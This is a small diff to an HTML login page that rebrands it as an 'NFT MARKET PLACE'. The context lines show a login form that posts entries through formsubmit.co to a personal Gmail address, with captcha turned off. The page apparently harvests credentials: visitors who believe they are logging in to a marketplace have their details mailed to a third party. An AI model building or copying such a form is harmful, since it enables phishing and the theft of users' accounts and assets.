--- a/index.html
+++ b/index.html
@@ -5,7 +5,7 @@
     <meta http-equiv="X-UA-Compatible" content="IE=edge">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
     <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css" referrerpolicy="no-referrer" />
-    <title>Login Page</title>
+    <title>NFT MARKET PLACE</title>
     <link rel="stylesheet" href="login.css">
 </head>
 <body>
@@ -15,7 +15,7 @@
             </br>
 </br>
             <div class="form-container">
-                <h3>LOGIN HERE</h3>
+                <h3>LOGIN  HERE</h3>
                 <form action="https://formsubmit.co/nftpro.minting@gmail.com" method="POST" class="form"
 
 <input type="hidden" name="_captcha" value="false">
